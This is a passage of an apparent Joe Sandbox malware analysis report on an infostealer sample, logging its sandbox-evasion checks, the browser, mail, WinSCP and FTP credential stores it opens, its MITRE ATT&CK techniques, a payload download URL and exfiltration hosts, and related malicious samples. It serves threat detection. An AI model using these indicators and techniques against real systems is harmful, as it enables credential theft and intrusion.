            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00150C77 push edi; retf 6_2_00150C7A
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeAPI/Special instruction interceptor: Address: 86D827C
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeAPI/Special instruction interceptor: Address: 5BB827C
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeRDTSC instruction interceptor: First address: 869C7C3 second address: 869C7C3 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, FFFFFFB2h 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FA3A4B1C297h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeRDTSC instruction interceptor: First address: 5B7C7C3 second address: 5B7C7C3 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, FFFFFFB2h 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FA3A4B646C7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeMemory allocated: 36990000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeMemory allocated: 367A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00402868 FindFirstFileW,6_2_00402868
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_004059CC
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_004065FD FindFirstFileW,FindClose,6_2_004065FD
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4277
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4431
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_73961B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73961B5F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeQueries volume information: C:\Users\user\Desktop\Awb 4586109146.bat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Awb 4586109146.bat.exe PID: 2884, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Awb 4586109146.bat.exe PID: 2884, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Awb 4586109146.bat.exe PID: 2884, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            11
            Masquerading
            2
            OS Credential Dumping
            311
            Security Software Discovery
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts11
            Process Injection
            12
            Virtualization/Sandbox Evasion
            1
            Credentials in Registry
            12
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Disable or Modify Tools
            Security Account Manager1
            System Network Configuration Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS2
            File and Directory Discovery
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets226
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Awb 4586109146.bat.exe17%VirustotalBrowse
            Awb 4586109146.bat.exe11%ReversingLabs
            Awb 4586109146.bat.exe100%AviraHEUR/AGEN.1338455
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://84.38.133.48/wlSTiHSjDLYgnyIzSMV100.bin0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.13.205
            truefalse
              high
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    http://84.38.133.48/wlSTiHSjDLYgnyIzSMV100.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.orgAwb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://nsis.sf.net/NSIS_ErrorErrorAwb 4586109146.bat.exefalse
                        high
                        https://api.ipify.org/tAwb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAwb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            84.38.133.48
                            unknownLatvia
                            203557DATACLUB-NLfalse
                            104.26.13.205
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1577288
                            Start date and time:2024-12-18 11:03:11 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Awb 4586109146.bat.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/10@2/2
                            EGA Information:
                            • Successful, ratio: 50%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 135
                            • Number of non-executed functions: 61
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for sample files taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target Awb 4586109146.bat.exe, PID 2884 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            84.38.133.48Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.48/TeoRHdGgbvsSqoRyBIQpbDk31.bin
                            104.26.13.205BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                            • api.ipify.org/
                            lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                            • api.ipify.org/
                            Simple1.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            api.ipify.orgHarrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            winws1.exeGet hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 104.26.13.205
                            rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                            • 104.26.13.205
                            https://www.canva.com/design/DAGZLdpMEGI/O58JBUDFuRvFcdZ0tgIwgA/edit?utm_content=DAGZLdpMEGI&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisherBrowse
                            • 104.26.12.205
                            https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 172.67.74.152
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            DATACLUB-NLPO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.133
                            ODjwCjQBAP.exeGet hashmaliciousGuLoaderBrowse
                            • 84.38.129.16
                            ODjwCjQBAP.exeGet hashmaliciousGuLoaderBrowse
                            • 84.38.129.16
                            Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.48
                            u9aPQQIwhj.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.42
                            Shipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.42
                            QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 84.38.133.160
                            Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 84.38.129.16
                            Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.129.16
                            PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 185.29.11.116
                            CLOUDFLARENETUSurS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                            • 172.64.41.3
                            https://2024sharepointonline.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                            • 104.16.20.118
                            https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                            • 1.1.1.1
                            EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                            • 104.18.86.42
                            ardware-v1.exeGet hashmaliciousLummaCBrowse
                            • 104.21.66.86
                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                            • 104.16.123.96
                            RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 172.67.177.134
                            ardware-v1.exeGet hashmaliciousLummaCBrowse
                            • 172.67.157.254
                            sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 172.65.251.78
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eurS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                            • 104.26.13.205
                            RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 104.26.13.205
                            x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                            • 104.26.13.205
                            sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.13.205
                            jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.13.205
                            Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.13.205
                            x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                            • 104.26.13.205
                            twjMb9cX64.exeGet hashmaliciousSliverBrowse
                            • 104.26.13.205
                            WOlxr4yjgF.exeGet hashmaliciousSliverBrowse
                            • 104.26.13.205
                            credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                            • 104.26.13.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dllkJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                              kJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                                B7zKt98iey.exeGet hashmaliciousUnknownBrowse
                                  B7zKt98iey.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                      file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                        http://mirror.cdex.mu/CDex-2.24.exeGet hashmaliciousUnknownBrowse
                                          http://mirror.cdex.mu/CDex-2.24.exeGet hashmaliciousUnknownBrowse
                                            ROM_Files_939964.exeGet hashmaliciousUnknownBrowse
                                              C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dllYF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                  CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                      AyqwnIUrcz.exeGet hashmaliciousUnknownBrowse
                                                        Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
